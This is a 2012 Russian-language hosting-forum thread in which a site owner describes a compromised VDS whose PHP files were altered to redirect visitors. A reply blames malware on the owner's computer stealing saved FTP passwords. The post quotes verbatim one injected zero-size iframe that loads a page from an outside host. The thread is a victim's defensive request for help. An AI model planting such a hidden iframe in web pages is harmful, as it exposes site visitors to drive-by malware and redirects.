Взлом сервера

SSL, TLS, Web protect, etc.

Модераторы: Art.i, vasya

Взлом сервера

Сообщение vissavi » Чт май 17, 2012 12:55 pm

здравствуйте. Недавно у меня взломали сервер и внесли изменения почти во все файлы с расширением php (добавили код который переадресует пользователей с поисковых систем на другие сайты) из-за этого много сайтов вылетели из индекса... добавили новые файлы (создали дополнительные странички, внесли изменения в карту сайта) и т.д. Я это все выявил, восстановил из чистого архива движки сайтов. По безопасности сделал следующее: запретил использование почтовых портов, ssh, и вход в админ панель только с одного ip адреса (он у меня статический). Но вот сегодня обнаружил, что опять на сайтах произошли изменения. Согласно журнала был вход под моим ip с 00-43 до 00-50 и изменены файлы в основном index.php внесли фрейм вида "<iframe src="http://mazahack.net/go.ph4lb" width=0 height=0 frameborder=0></iframe>" ...
Тарифный план - VDS-Разгон
Подскажите пожалуйста как такое стало возможным (статический адрес только у меня такой) и как я смогу себя обезопасить. Спасибо.
vissavi
 
Сообщений: 2
Зарегистрирован: Вт май 04, 2010 8:23 pm

Re: Взлом сервера

Сообщение swg » Чт май 17, 2012 12:58 pm

Комп вылечить от вирусов, раз с вашего IP "взлом". Вероятно, пароль от FTP сохранен в каком либо файловом менеджере (галочки "сохранить пароль" в explorer уже достаточно), а FAR, * commnader еще проще (ini -файлы).
swg
флудит форум
 
Сообщений: 2386
Зарегистрирован: Сб окт 07, 2006 9:09 am
Откуда: NNov


Вернуться в Безопасность

Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2